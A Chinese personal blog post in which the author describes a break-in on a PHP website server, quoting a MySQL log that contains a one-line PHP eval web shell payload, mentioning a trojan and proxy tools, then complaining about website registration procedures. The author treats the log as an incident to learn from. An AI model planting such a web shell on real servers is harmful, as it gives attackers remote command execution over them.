一些计算机零碎知识随写(25年1月)-1

我原以为世界上有技术的那批人不会那么闲,我错了,被脚本真实了。

今天正隔着画画呢,手机突然弹出几条安全告警通知。

急忙打开服务器,发现问题不简单,直接关服务器重装系统.....

首先,不要认为小网站,没什么人看就不做防护

互联网不缺乏脚本小子和没啥事喜欢攻击的黑客(在这个时代也不是没有可能是恶意的流窜ai),不要向我一样,认为这个网站没什么人看,什么保护也不加,等到被爆破了才急忙修改,要是生产环境被这么搞一下那就很坏了。(各种意义上的)

因为我是php写的网站,php的漏洞很多是历史遗留问题了,没有很好的代码规范的话那很容易被入侵。

就比如我没有加入文件验证之类的(我当时的想法:不会有人这么闲吧)。

我的思考

php这个语言漏洞太多,对于我来说要么以后补课网络安全php这方面的课程,要么趁早换一门语言。

那名坏笔到底在我服务器干了什么呢?

事情已经发生了,气急败坏不如冷静分析。

首先是恶意上传一个php文件,然后查询了我所有的数据库文件

具体的代码如下

php 复制代码
C:\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time                 Id Command    Argument
		   60 Query	select'<?php eval($_POST[admin]);?>'
		   60 Quit

那很坏了

eval 函数在这种情况下如果被成功执行,明显是具有恶意企图的,可能会导致服务器被攻击者远程控制、执行任意命令等安全风险。

第二个是一个木马病毒

太坏了

根据计算机病毒百科来看这玩意是近几年的开发的病毒。

可能会修改系统的关键文件,造成系统崩溃或无法正常启动。

它可以监控用户的计算机操作,并窃取敏感信息,如银行账户密码、个人隐私等。

所以说病毒什么乱七八糟并不是少了,而是坏笔们不直接打普通电脑了。

最终它干了什么

看样子是想把我服务器当作代理(?不确定。从它后面安装的内网穿透工具和代理工具来看是这样的。

然后正上厕所呢,公安给我打电话来了。

公安备案失败

之前icp备案根据腾讯云的提示操作起来没有过于麻烦,就是写写表(个人是这样,企业的话多一些步骤。)

然后icp过完审核居然还要公安部审核,就不能一起审核吗,真是徒增开发者的麻烦呢。

个人的网站icp备案和公安的表几乎没有什么差别,所以真的很难理解呢!

然后就打电话告诉我说不受理,去自己的户籍地办理去(icp是常驻地)

emm...???

感叹一些地方上的办事效率差,效率低了。

所以你以为我要告诉你个人开发者地址填写的时候要写户籍地icp写常驻地吗?

不啊我的朋友,个人博客要就不申请域名要不就一步到位买国外的好啦!就不用这么多麻烦的手续啦!

相关推荐
小安运维日记5 小时前
CKS认证 | Day3 K8s容器运行环境安全加固
运维·网络·安全·云原生·kubernetes·云计算
Synfuture阳途6 小时前
关于终端安全管理系统的超全解析
网络·安全·web安全
IT科技那点事儿6 小时前
全面守护关键基础设施!Fortinet OT 安全平台功能与服务再扩展
安全
echoHaha036 小时前
域渗透(web安全)
网络·安全
盐碱地里的木桐8 小时前
中国网络安全产业分析报告
安全·web安全·智能网联汽车
是程序喵呀9 小时前
软考《信息系统运行管理员》- 6.2 信息系统硬件的安全运维
网络·安全·软考
Sweet_vinegar10 小时前
变量1(WEB)
安全·web·ctf·bugku
故事与他64510 小时前
电子文档安全管理系统V6.0接口backup存在任意文件下载漏洞
java·开发语言·前端·javascript·安全·网络安全
秋说10 小时前
【区块链安全 | 第十三篇】Solidity 合约结构
安全·区块链